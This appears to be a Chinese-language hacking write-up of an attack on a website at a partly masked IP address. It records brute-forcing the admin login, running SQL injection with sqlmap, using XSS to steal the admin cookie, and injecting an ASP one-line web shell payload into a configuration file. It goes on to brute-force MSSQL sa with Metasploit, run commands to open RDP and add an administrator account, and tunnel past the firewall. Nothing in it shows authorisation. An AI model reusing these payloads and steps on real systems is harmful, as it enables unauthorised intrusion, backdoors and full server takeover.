目標網站:39.xxx.xxx.xxx
一階段前台測試:
1、前台存在登陸入口且無驗證碼(肯定要暴力破解啊)
2、前台url參數處加敏感字符數據庫報錯存在sql注入
3、前台登陸處輸入危險字符,數據庫報錯存在post注入
測試結果如下:
暴力破解獲得
用戶名:admin
密碼:123456
利用sqlmap跑注入並沒有跑出任何數據
只能登陸看一下了
二、登陸前台測試
利用前台的會員登陸發現有使用第三方編輯器(並沒有找到可利用漏洞)
存在xss漏洞
存在sql注入漏洞
在登陸的狀態下繼續進行sql注入(burp copyto file )發現跑出來一個表
只跑出了當前賬戶和一個同級賬戶
到這里看了眼后台還是一臉懵逼
三、黑盒已經不好搞了,下載同類CMS
搭建環境擼一把
把相同源碼cms數據庫表名
將對應表明加入sqlmap庫中
路徑:sqlmap/txt/common-tables.txt
(表名一定要放前邊放最后要跑一年的)
繼續sqlmap跑、
成功進入后台
四、getshell
進入后台之后發現編輯器兩個
文件上傳白名單,試了很久,基本行不通了
后台依舊存在XSS漏洞(這里的XSS可以利用拿到后台管理員cookie)
搞了半天發現又遇到瓶頸了
再去擼一把源碼
發現當更新緩存的時候,根目錄下多了一個HTML文件修改html文件后發現報錯
在后台參數配置處修改配置發現報錯
審查代碼發現代碼漏洞
anxi
nMall.basic.asp是一個ASP文件考慮寫入一句話
本地構造payload(這里隨便改點東西網站就癱了如果在目標網站那肯定涼涼了)
"%> <%eval request ("pass")%> <%'
這里原有的郵箱 只能閉合 不能刪掉,不然數據庫會錯誤
菜刀連接、
五、提權、
nmap掃描發現目標開放1433端口
msf對1433端口sa進行爆破
爆破成功
mssql賬號和密碼為:sa /123456
使用msf命令執行模塊,執行最終的dos命令
use auxiliary/admin/mssql/mssql_exec
開啟3389端口並且建立管理用戶以后
利用HTTP隧道進行連接3389(繞過防火牆)
詳細方法見下面的網址
https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html
另外可以
通過MSFVenom生成exe后門木馬拿shell()